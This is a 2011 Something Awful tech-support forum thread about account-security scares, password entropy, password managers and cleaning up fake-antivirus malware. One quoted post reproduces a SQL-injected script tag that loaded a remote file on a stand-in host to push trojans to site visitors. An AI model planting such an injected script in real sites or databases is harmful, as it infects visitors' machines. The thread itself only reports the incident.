Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

• Locked thread
Factory Factory
Mar 19, 2010

This is what
Arcane Velocity was like.
Rrrrgh, headaaaache. I just got an e-mail from the Google Account Recovery Team (legit) indicating that my attempt to recover my account failed. I did not attempt to recover my account.

While I'm glad it failed, I am feeling real paranoid, here. What are my options for making sure this doesn't work?

Adbot
ADBOT LOVES YOU

bobmarleysghost
Mar 7, 2006

Factory Factory posted:

Rrrrgh, headaaaache. I just got an e-mail from the Google Account Recovery Team (legit) indicating that my attempt to recover my account failed. I did not attempt to recover my account.

While I'm glad it failed, I am feeling real paranoid, here. What are my options for making sure this doesn't work?

Set up a long password that contains no dictionary words, has capital letters, lowercase letters, numbers AND symbols.

ex: a?s3D#F56p?*

EDIT: also make sure your secret question answers are non-sensical. ex: What is your dog's name? "Gibberish.com"

bobmarleysghost fucked around with this message at 19:06 on Apr 4, 2011

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

feld posted:

Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script>

They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server.

:smith:

http://www.techwatch.co.uk/2011/04/01/lizamoon-sql-injection-attack-hits-tons-of-websites/

?

Crossbar
Jun 16, 2002
Chronic Lurker

Factory Factory posted:

You can set up two-factor authentication.

http://googleblog.blogspot.com/2011/02/advanced-sign-in-security-for-your.html

Kelson
Jan 23, 2005

Santa is strapped posted:

Set up a long password that contains no dictionary words, has capital letters, lowercase letters, numbers AND symbols.

ex: a?s3D#F56p?*

EDIT: also make sure your secret question answers are non-sensical. ex: What is your dog's name? "Gibberish.com"

What? Ignore this password advice; just make an (actually) long password. For example (minus or plus quotes): "sept the Jegger tot leter"

a?s3D#F56p?* = 12 characters upper,lower,digits + symbols (lets say 10) vs 25 characters upper/lower.

code:
12-character = 72^12 = 1.940840996e22
25-character = 52^25 = 7.944811378e42
20 freaking orders of magnitude! Hell, lets see how simple it can be and be just as hard as this 12 character stupidity.

code:
a?s3D#F56p?*     = 1.94084099e22
sodotfotpleasing = 4.36087429e22
All lowercase and it's already 2x HARDER than that 12 character bullshit, plus it is much easier to remember. Use a longer password, don't worry about symbols (I like spaces and dashes though), and don't use dictionary words.

Kelson fucked around with this message at 01:52 on Apr 5, 2011

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

Kelson posted:

What? Ignore this password advice; just make an (actually) long password. For example (minus or plus quotes): "sept the Jegger tot leter"

a?s3D#F56p?* = 12 characters upper,lower,digits + symbols (lets say 10) vs 25 characters upper/lower.

code:
12-character = 72^12 = 1.940840996e22
25-character = 52^25 = 7.944811378e42
20 freaking orders of magnitude! Hell, lets see how simple it can be and be just as hard as this 12 character stupidity.

code:
a?s3D#F56p?*     = 1.94084099e22
sodotfotpleasing = 4.36087429e22
All lowercase and it's already 2x HARDER than that 12 character bullshit, plus it is much easier to remember. Use a longer password, don't worry about symbols (I like spaces and dashes though), and don't use dictionary words.

H$RDP$ssw0rds don't need to be hard to type/remember.

Factory Factory
Mar 19, 2010

This is what
Arcane Velocity was like.
Good advice, everyone.

It was a false alarm, however. A family member used my e-mail as contact after mistyping her password and then hosed up recovery because too many typos were made in the recovery form. :rolleyes:

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

PopeOnARope posted:

Many crackers can be configured to use a = @, s = $, o = 0....

Adding more characters always helps, but the real enemy is poor implementations by websites and re-use.

Cuntpunch
Oct 3, 2003

A monkey in a long line of kings

Bob Morales posted:

Many crackers can be configured to use a = @, s = $, o = 0....

Adding more characters always helps, but the real enemy is poor implementations by websites and re-use.

These days I should hope anyone tech saavy would use something like KeePass for anything they don't need mobile access to. Being able to quickly generate long, hard to remember passwords that are easily accessible when you need them seems better than simply using letter-swap rules.

bbcisdabomb
Jan 15, 2008

SHEESH

Cuntpunch posted:

These days I should hope anyone tech saavy would use something like KeePass for anything they don't need mobile access to. Being able to quickly generate long, hard to remember passwords that are easily accessible when you need them seems better than simply using letter-swap rules.

Hell, since most of this poo poo is online I just make sure I have my PortableApps thumbdrive with me at all times. I don't know my SA password, but I'm logged in on PortableFireFox for anywhere surfing.

Verdugo
Jan 5, 2009

Lipstick Apathy

bbcisdabomb posted:

Hell, since most of this poo poo is online I just make sure I have my PortableApps thumbdrive with me at all times. I don't know my SA password, but I'm logged in on PortableFireFox for anywhere surfing.

My keypass ridiculousness: Brand new Keypass installation -- the first time plugging my thumbdrive into my home PC to back everything up (after setting keypass up on thumb drive from work laptop), USB port is bad, drive fried, all data (including password database) non recoverable. Should have backed up the keypass database first thing but I was going to do it on my home PC. This is before I started using dropbox. What a giant pain in the rear end resetting every single password I had was.

Technogeek
Sep 9, 2002

by FactsAreUseless

Cuntpunch posted:

I don't even need to limit it to "stuff I don't need mobile access to". Dropbox + KeePassDroid means I'm good to go anywhere.

Oddhair
Mar 21, 2004

I couldn't get KeePassDroid to use an authentication file, but that ended up being no additional security, since the key file was right there on the flash drive I use for KeePass as well as on the phone.

Suspicious
Apr 30, 2005
You know he's the villain, because he's got shifty eyes.
I just use a dozen short strings or so I remember by heart and mix and match em whenever I need to generate a password. I can make absurdly long passwords that are still easy to remember.

Janitor Prime
Jan 22, 2004

PC LOAD LETTER

What da fuck does that mean

Fun Shoe

Technogeek posted:

I don't even need to limit it to "stuff I don't need mobile access to". Dropbox + KeePassDroid means I'm good to go anywhere.

:respek:

Yeah this is the best, but I still have a few copies of my KeePass database on my usb sticks.

equation groupie
Feb 7, 2004

debased and dread pilled

Technogeek posted:

I use a similar system based on 1Password. It's not particularly cheap, as you have to buy a license for Windows, OS X, and iOS separately, but it's a really excellent solution that offers browser integration on the Mac and Windows side of things and built-in Dropbox sync.

(Plus it's Hardison-approved.)

Kelson
Jan 23, 2005

PopeOnARope posted:

I agree; "this is a hard password for any password cracker" to break and it is incredibly easy to remember. On the other hand, as Bob Morales said, your string doesn't actually make password guessing much harder; you've gained far more security simply by combining two words than those character replacements.

Cuntpunch posted:

KeePass is awesome; almost everyone should use it. Plus, because the db is encrypted (and may require a security file), you can distribute it freely. It requires more trust in the crypto, but you've gained tremendous availability advantages (backed up in email, remotely accessible, etc etc).

PopeOnARope
Jul 23, 2007

Kelson posted:

I agree; "this is a hard password for any password cracker" to break and it is incredibly easy to remember. On the other hand, as Bob Morales said, your string doesn't actually make password guessing much harder; you've gained far more security simply by combining two words than those character replacements.

KeePass is awesome; almost everyone should use it. Plus, because the db is encrypted (and may require a security file), you can distribute it freely. It requires more trust in the crypto, but you've gained tremendous availability advantages (backed up in email, remotely accessible, etc etc).

It's not just about the difficulty of memorization though, I tend to enjoy the simplicity of entry. With that particular password, the only things special that YOU need to do is hold shift for part of it, and sub an o with a 0. It's a lot easier than typing a 25+ character one in.

ephphatha
Dec 18, 2009

PopeOnARope posted:

It's not just about the difficulty of memorization though, I tend to enjoy the simplicity of entry. With that particular password, the only things special that YOU need to do is hold shift for part of it, and sub an o with a 0. It's a lot easier than typing a 25+ character one in.

I use KeePass2. If I ever need to type in a password I open KeePass, doubleclick the password I need, then press Ctrl+V and enter.

One of the reasons I use KeePass is that I never have to actually know my passwords, so if someone attempted to ask me what my password was for service X I wouldn't be able to tell them anyway.

Pope Guilty
Nov 6, 2006

The human animal is a beautiful and terrible creature, capable of limitless compassion and unfathomable cruelty.
I just got a virus off of somebody's computer that had marked her User folders as hidden. You could open Word documents through the Recent Items shortcut but couldn't search for them. That's a new one on me.

mmherens
Jun 10, 2010

Pope Guilty posted:

I just got a virus off of somebody's computer that had marked her User folders as hidden. You could open Word documents through the Recent Items shortcut but couldn't search for them. That's a new one on me.

I Just ran into this same thing. It was called "Windows Recovery" it marked all the folders on the C drive as hidden and changed registry permissions on the computer.

Vanagoon
Jan 20, 2008

Best Dead Gay Forums
on the whole Internet!
Forgive me for butting into this thread but I wanted to ask the following:

Is the old saw about not running as administrator during your day to day computer use still applicable? I mean to say does this do anything to stop this poo poo from getting on your machine or does it exploit flaws in Windows/IE/Firefox/Adobeanything that are going to let poo poo happen no matter what?

I always run as a limited user since Vista since UAC makes it easier to elevate when needed. Is it doing any good?

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

Vanagoon posted:

Forgive me for butting into this thread but I wanted to ask the following:

Is the old saw about not running as administrator during your day to day computer use still applicable? I mean to say does this do anything to stop this poo poo from getting on your machine or does it exploit flaws in Windows/IE/Firefox/Adobeanything that are going to let poo poo happen no matter what?

I always run as a limited user since Vista since UAC makes it easier to elevate when needed. Is it doing any good?

So long as you are using the default settings, an administrator account will execute everything with user credentials unless you explicitly elevate. This is essentially what you are doing now, but with files split over two profiles which can be a bit annoying. There really isn't a reason to do it that way any more if you don't want to.

mmm11105
Apr 27, 2010
Anyone tried to fix that stupid Facebook "roller coaster crash in canada" virus. Nukes you boot.ini so I used recovery console to make a new one, and the motherboard still shows up as nuked. I will probably end up telling the customer that the whole hard drive needs to be nuked, started for scratch again. Tried a Linux live cd to transfer files off, but she is running a 1.2ghz Athalon XP, so none of them will work.

ozmunkeh
Feb 28, 2008

hey guys what is happening in this thread

mmm11105 posted:

I will probably end up telling the customer that the whole hard drive needs to be nuked, started for scratch again. Tried a Linux live cd to transfer files off, but she is running a 1.2ghz Athalon XP, so none of them will work.

Wow.

PUBLIC TOILET
Jun 13, 2009

mmm11105 posted:

Anyone tried to fix that stupid Facebook "roller coaster crash in canada" virus. Nukes you boot.ini so I used recovery console to make a new one, and the motherboard still shows up as nuked. I will probably end up telling the customer that the whole hard drive needs to be nuked, started for scratch again. Tried a Linux live cd to transfer files off, but she is running a 1.2ghz Athalon XP, so none of them will work.

Honestly, this sounds like one of those situations where you should turn the customer away and tell them to buy a new computer.

PopeOnARope
Jul 23, 2007

Pope Guilty posted:

I just dealt with that infection yesterday.

I was doing my usual thing, using the command prompt to root through the %appdata% folders, and the \roaming\ one came back with one folder. I was perplexed. Then I checked the \local\ one. Then I figured out what that fucker did. It's one of the ones that did the whole :siren: Warning! 34% of your hard drive clusters are corrupt and unreadable :siren: crap.

\/ I got that at work, running Firefox too. I think in that case, if you clicked "Ok" you'd be prompted to download some poo poo. Probably nothing other than the garden variety java exploit crap. Lord knows ours is like 83 years out of date.

PopeOnARope fucked around with this message at 06:43 on Apr 23, 2011

MREBoy
Mar 14, 2005

MREs - They're whats for breakfast, lunch AND dinner !
Anyone know what vector this Win Anti Virus 2011 crap is trying to exploit ? I was searching for an image via Google Images, I clicked on one particular thumbnail image, and a moment later my Firefox 4 window immediately shrinks to minimum size. I re-size it and its got an alert message with some Engrish "You are havings teh Viruses! SCAN NAO!" message up, and the window title is WinAntiVirus 2011. I just closed the whole window without clicking on anything and my computer hasn't been acting strange at all.

Impotence
Nov 8, 2010
Lipstick Apathy

MREBoy posted:

Anyone know what vector this Win Anti Virus 2011 crap is trying to exploit ? I was searching for an image via Google Images, I clicked on one particular thumbnail image, and a moment later my Firefox 4 window immediately shrinks to minimum size. I re-size it and its got an alert message with some Engrish "You are havings teh Viruses! SCAN NAO!" message up, and the window title is WinAntiVirus 2011. I just closed the whole window without clicking on anything and my computer hasn't been acting strange at all.

Normally it's flash/java/pdf, for that I think

Why aren't you running noscript and disabling redirects without having to click allow?

pienipple
Mar 20, 2009

That's wrong!

mmm11105 posted:

Hahaha what. I can understand a live cd being slow on an old system like that if you're using like, a full Ubuntu disc or something. Use drat Small Linux or Puppy Linux instead. I use Puppy Linux on a 1.1Ghz celeron laptop and it's downright snappy.

mmm11105
Apr 27, 2010

pienipple posted:

Hahaha what. I can understand a live cd being slow on an old system like that if you're using like, a full Ubuntu disc or something. Use drat Small Linux or Puppy Linux instead. I use Puppy Linux on a 1.1Ghz celeron laptop and it's downright snappy.

Yeah, I dug up a disc of drat Small Linux that worked. Got her files off, nuked it with gParted and started from scratch. Works just fine now. This computer does not have one original part in it except the HDD.

Current Specs on it:
1.2ghz Athlon XP
256MB RAM
nForce 2 MOBO
nVidia RIVA TNT2 32MB (competitor to the Voodo3 and the Rage128)
super old wireless card (took forever to find drivers for it)

edit:and it was manufactured by Tagar Systems (never heard of them)

mmm11105 fucked around with this message at 17:03 on Apr 25, 2011

Goreld
May 8, 2002

"Identity Crisis" MurdererWild Guess Bizarro #1Bizarro"Me am first one I suspect!"

Biowarfare posted:

Normally it's flash/java/pdf, for that I think

Why aren't you running noscript and disabling redirects without having to click allow?

Apparently gstatic.com is completely compromised.

I was just browsing google images and got weird activity (I'm using both noscript and adblock and scanned afterwards, so I'm pretty certain it didn't do anything, but the image was definitely doing something weird)

Furnok Dorn
Mar 30, 2004
SOCIALLY WORTHLESS SHUT-IN NERD
Anybody else encountered a virus that plays frigging sound ads? It did the 'hide all desktop items' bit as well as the fakeav, but playing sound ads with no browser process running is a new one to me.

Maniaman
Mar 3, 2006

Furnok Dorn posted:

Anybody else encountered a virus that plays frigging sound ads?

Had one laptop in my shop that would randomly start talking to me in a sexy voice and try to sell me random junk. Nothing ever popped up on the screen, it was just audio. Malwarebytes finally nailed it after a few days of definition updates and a full scan.

Furnok Dorn
Mar 30, 2004
SOCIALLY WORTHLESS SHUT-IN NERD

Maniaman posted:

Had one laptop in my shop that would randomly start talking to me in a sexy voice and try to sell me random junk. Nothing ever popped up on the screen, it was just audio. Malwarebytes finally nailed it after a few days of definition updates and a full scan.

Yeah, I managed to gas it with superantispyware but I kept looking around the damned office for where the hell this voice was coming from, I thought I was going nuts.

Scaramouche
Mar 26, 2001

SPACE FACE! SPACE FACE!

Had an interesting one on the social engineering front; a user had ms tools. However, instead of buying mstools, they went out and bought AVG instead. I was impressed by this, and I wonder how often the scareware people are actually inadvertently ending up having people buy 'real' antivirus. I think this might actually become the status quo. This was a younger person but one who was all 'oh man I don't know anything about computers'. However they knew enough to have previous brand awareness of an anti-virus program instead of just panicking out right like a lot of the older victims to this kind of plot.

BangersInMyKnickers
Nov 3, 2004

That malware that marks every single file in a user profile as hidden can gently caress right the hell off.

Pope Guilty
Nov 6, 2006

The human animal is a beautiful and terrible creature, capable of limitless compassion and unfathomable cruelty.

Furnok Dorn posted:

Anybody else encountered a virus that plays frigging sound ads? It did the 'hide all desktop items' bit as well as the fakeav, but playing sound ads with no browser process running is a new one to me.

There was an absolutely amazing thread in YOSPOS awhile back where somebody found a malwareinstaller that would install dialers which would install dialers which would install dialers and so on. I remember the phrase "Around lunchtime, it started making slot machine noises."

Pope Guilty
Nov 6, 2006

BangersInMyKnickers posted:

That malware that marks every single file in a user profile as hidden can gently caress right the hell off.

I'm getting used to the message "Windows cannot find C:/Windows/System32/rsrtui.exe".

Adbot
ADBOT LOVES YOU

BangersInMyKnickers
Nov 3, 2004

I'm sure a few people have OpenDNS accounts for personal use or whatever, but we're looking at using ClearCloud DNS for the DNS provider on laptops to block access to known malware domains. Free for business use as far as I can tell and it has pretty good performance when I tested it on DNS Benchmark.

• Locked thread